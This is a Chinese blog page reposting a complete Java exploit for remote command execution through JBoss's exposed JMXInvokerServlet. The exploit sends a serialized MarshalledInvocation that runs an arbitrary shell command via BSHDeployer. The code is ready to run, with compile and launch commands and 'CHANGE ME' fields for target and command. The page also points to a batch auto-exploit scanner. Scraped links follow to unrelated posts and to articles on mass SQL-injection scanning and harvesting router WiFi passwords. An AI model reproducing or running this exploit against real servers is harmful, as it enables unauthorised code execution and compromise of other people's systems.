exploit-db提供出了EXP,如下:

 /*

  * JBoss JMXInvokerServlet Remote Command Execution

  * JMXInvoker.java v0.3 - Luca Carettoni @_ikki

  *

  * This code exploits a common misconfiguration in JBoss Application Server (4.x, 5.x, ...).

  * Whenever the JMX Invoker is exposed with the default configuration, a malicious "MarshalledInvocation"

  * serialized Java object allows to execute arbitrary code. This exploit works even if the "Web-Console"

  * and the "JMX Console" are protected or disabled.

  *

  * [FAQ]

  *

  * Q: Is my target vulnerable?

  * A: If http://<target>:8080/invoker/JMXInvokerServlet exists, it's likely exploitable

  *

  * Q: How to fix it?

  * A: Enable authentication in "jmx-invoker-service.xml"

  *

  * Q: Is this exploit version-dependent?

  * A: Unfortunately, yes. An hash value is used to properly invoke a method.

  *    At least comparing version 4.x and 5.x, these hashes are different.

  *

  * Q: How to compile and launch it?

  * A: javac -cp ./libs/jboss.jar:./libs/jbossall-client.jar JMXInvoker.java

  *    java  -cp .:./libs/jboss.jar:./libs/jbossall-client.jar JMXInvoker

  *    Yes, it's a Java exploit. I can already see some of you complaining....

  */

 import java.io.BufferedReader;

 import java.io.IOException;

 import java.io.InputStream;

 import java.io.InputStreamReader;

 import java.io.ObjectOutputStream;

 import java.lang.reflect.Array;

 import java.lang.reflect.Field;

 import java.lang.reflect.Method;

 import java.net.ConnectException;

 import java.net.HttpURLConnection;

 import java.net.URL;

 import javax.management.MalformedObjectNameException;

 import javax.management.ObjectName;

 import org.jboss.invocation.MarshalledInvocation; //within jboss.jar (look into the original JBoss installation dir)

 public class JMXInvokerServlet {

     //---------> CHANGE ME <---------

     static final int hash = 647347722; //Weaponized against JBoss 4.0.3SP1

     static final String url = "http://127.0.0.1:8080/invoker/JMXInvokerServlet";

     static final String cmd = "touch /tmp/exectest";

     //-------------------------------

     public static void main(String[] args) throws ClassNotFoundException, NoSuchMethodException, MalformedObjectNameException {

         System.out.println("\n--[ JBoss JMXInvokerServlet Remote Command Execution ]");

         //Create a malicious Java serialized object

         MarshalledInvocation payload = new MarshalledInvocation();

         payload.setObjectName(new Integer(hash));

         //Executes the MBean invoke operation

         Class<?> c = Class.forName("javax.management.MBeanServerConnection");

         Method method = c.getDeclaredMethod("invoke", javax.management.ObjectName.class, java.lang.String.class, java.lang.Object[].class, java.lang.String[].class);

         payload.setMethod(method);

         //Define MBean's name, operation and pars

         Object myObj[] = new Object[4];

         //MBean object name

         myObj[0] = new ObjectName("jboss.deployer:service=BSHDeployer");

         //Operation name

         myObj[1] = new String("createScriptDeployment");

         //Actual parameters

         myObj[2] = new String[]{"Runtime.getRuntime().exec(\"" + cmd + "\");", "Script Name"};

         //Operation signature

         myObj[3] = new String[]{"java.lang.String", "java.lang.String"};

         payload.setArguments(myObj);

         System.out.println("\n--[*] MarshalledInvocation object created");

         //For debugging - visualize the raw object

         //System.out.println(dump(payload));

         //Serialize the object

         try {

             //Send the payload

             URL server = new URL(url);

             HttpURLConnection conn = (HttpURLConnection) server.openConnection();

             conn.setRequestMethod("POST");

             conn.setDoOutput(true);

             conn.setDoInput(true);

             conn.setUseCaches(false);

             conn.setRequestProperty("Accept", "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2");

             conn.setRequestProperty("Connection", "keep-alive");

             conn.setRequestProperty("User-Agent", "Java/1.6.0_06");

             conn.setRequestProperty("Content-Type", "application/octet-stream");

             conn.setRequestProperty("Accept-Encoding", "x-gzip,x-deflate,gzip,deflate");

             conn.setRequestProperty("ContentType", "application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation");

             ObjectOutputStream wr = new ObjectOutputStream(conn.getOutputStream());

             wr.writeObject(payload);

             System.out.println("\n--[*] MarshalledInvocation object serialized");

             System.out.println("\n--[*] Sending payload...");

             wr.flush();

             wr.close();

             //Get the response

             InputStream is = conn.getInputStream();

             BufferedReader rd = new BufferedReader(new InputStreamReader(is));

             String line;

             StringBuffer response = new StringBuffer();

             while ((line = rd.readLine()) != null) {

                 response.append(line);

             }

             rd.close();

             if (response.indexOf("Script Name") != -1) {

                 System.out.println("\n--[*] \"" + cmd + "\" successfully executed");

             } else {

                 System.out.println("\n--[!] An invocation error occured...");

             }

         } catch (ConnectException cex) {

             System.out.println("\n--[!] A connection error occured...");

         } catch (IOException ex) {

             ex.printStackTrace();

         }

     }

     /*

      * Raw dump of generic Java Objects

      */

     static String dump(Object o) {

         StringBuffer buffer = new StringBuffer();

         Class oClass = o.getClass();

         if (oClass.isArray()) {

             buffer.append("[");

             for (int i = 0; i < Array.getLength(o); i++) {

                 if (i > 0) {

                     buffer.append(",\n");

                 }

                 Object value = Array.get(o, i);

                 buffer.append(value.getClass().isArray() ? dump(value) : value);

             }

             buffer.append("]");

         } else {

             buffer.append("{");

             while (oClass != null) {

                 Field[] fields = oClass.getDeclaredFields();

                 for (int i = 0; i

                         < fields.length; i++) {

                     if (buffer.length() > 1) {

                         buffer.append(",\n");

                     }

                     fields[i].setAccessible(true);

                     buffer.append(fields[i].getName());

                     buffer.append("=");

                     try {

                         Object value = fields[i].get(o);

                         if (value != null) {

                             buffer.append(value.getClass().isArray() ? dump(value) : value);

                         }

                     } catch (IllegalAccessException e) {

                     }

                 }

                 oClass = oClass.getSuperclass();

             }

             buffer.append("}");

         }

         return buffer.toString();

     }

 }

批量扫描az0ne在github上已经有了,https://github.com/az0ne/jboss_autoexploit

JBOSS批量扫描的更多相关文章

  1. Burpsuite+sqlmap批量扫描sql漏洞

    1.burpsuite设置导出log n'd'k 输入文件名保存 2.sqlmap批量扫描     python sqlmap.py -l 文件名 --batch -smart     batch:自 ...

  2. BurpSuite导出log配合SQLMAP批量扫描注入点

    sqlmap可以批量扫描包含有request的日志文件,而request日志文件可以通过burpsuite来获取, 因此通过sqlmap结合burpsuite工具,可以更加高效的对应用程序是否存在SQ ...

  3. 批量扫描互联网无线路由设备telnet,并获取WIFI密码

    批量扫描互联网无线路由设备telnet,并获取WIFI密码 http://lcx.cc/?i=4513

  4. sqlmap批量扫描burpsuite请求日志记录

    sqlmap可以批量扫描包含有request的日志文件,而request日志文件可以通过burpsuite来获取, 因此通过sqlmap结合burpsuite工具,可以更加高效的对应用程序是否存在SQ ...

  5. BBScan — 一个信息泄漏批量扫描脚本

    github:https://github.com/lijiejie/BBScan 有些朋友手上有几十万甚至上百万个域名,比如,乌云所有厂商的子域名. 如果把这30万个域名全部扔给wvs,APPsca ...

  6. wwwscan网站目录文件批量扫描工具

    准备一个比赛样题里面给的一个扫描的工具: 不知道怎么用就上网百度了一下果然有关于这个软件的两篇介绍(感觉写的很好),第一篇介绍的应该和我的工具一样,也给了例子(现在Google不能访问了)和参数介绍, ...

  7. sqlmap批量扫描burpsuite拦截的日志记录

    1.功能上,sqlmap具备对burpsuite拦截的request日志进行批量扫描的能力 python sqlmap.py -l hermes.log --batch -v 3 --batch:会自 ...

  8. 批量扫描IP端口程序 (适用于window&linux)

    批量扫描IP端口,根据扫描IP导出IP命名的文件的结果.假设1.txt文件内容为127.0.0.1192.168.1.1然后我们获取文件内容IP进行扫描window .bat版本 :1.txt为文件名 ...

  9. 从Excel获取整列内容进行批量扫描

    实习工作原因,需要测试excel表里面ip地址是否存在漏洞,扫了一眼,呕,四五百个IP,光是挨个进行访问,都是一个浩大的工程,所以准备开始摸鱼认真工作 思路是:excel按列提取->将IP按行存 ...

随机推荐

  1. SqlSever中Index Seek的匹配规则(一)

    我们知道在SqlServer中,索引对查询语句的优化起着巨大的作用,一般来说在执行计划中出现了Index Seek的步骤,我们就认为索引命中了.但是Index Seek中有两个部分是值得我们注意的,我 ...

  2. HGE引擎之hgeSprite

    一.hgeSprite类 hgeSprite是一个精灵实体的HGE帮助类. 1.构造函数 创建和初始化一个hgeSprite对象. hgeSprite(HTEXTURE tex, float x, f ...

  3. hibernate笔记03

  4. html5游戏引擎phaser官方示例学习

    首发:个人博客,更新&纠错&回复 phaser官方示例学习进行中,把官方示例调整为简明的目录结构,学习过程中加了点中文注释,代码在这里. 目前把官方的完整游戏示例看了一大半, brea ...

  5. 去除冗余 – 精简您的CSS样式代码

    讲讲常见的一些没有必要使用CSS代码情况,而这些不起作用可以去掉的CSS代码可能是我们经常忽视的.越是对CSS理解不够,越容易出现这些问题. 二.一些常见不必要CSS样式 1.与默认CSS样式一致 我 ...

  6. 161027、Java 中的 12 大要素及其他因素

    对于许多人来说,"原生云"和"应用程序的12要素"是同义词.本文的目的是说有很多的原生云只坚持了最初的12个因素.在大多数情况下,Java 能胜任这一任务.在本 ...

  7. asp显示记录条数

    Sql = "select * from xin126 where ID=" & id Rs.Open Sql,Conn,1,1 %> 共有<strong st ...

  8. 调整iFrame高度

    在Chrome中,即使将iframe的高度设置为100%,也无法根据内容页自动调节高度,需要在iframe的onload even中通过计算设置iframe的高度 function setIframe ...

  9. 【PHP设计模式 11_QiaoJie.php】桥接模式(针对 二维模型)

    <?php /** * [桥接模式(针对 二维模型)] * 对于多维度需要处理的事情,多耦合 * 第一维度,发送信息的类型:站内信.email.手机短信 * 第二维度,发送信息的紧急程度:普通. ...

  10. HDU 1728:逃离迷宫(BFS)

    http://acm.hdu.edu.cn/showproblem.php?pid=1728 逃离迷宫 Problem Description   给定一个m × n (m行, n列)的迷宫,迷宫中有 ...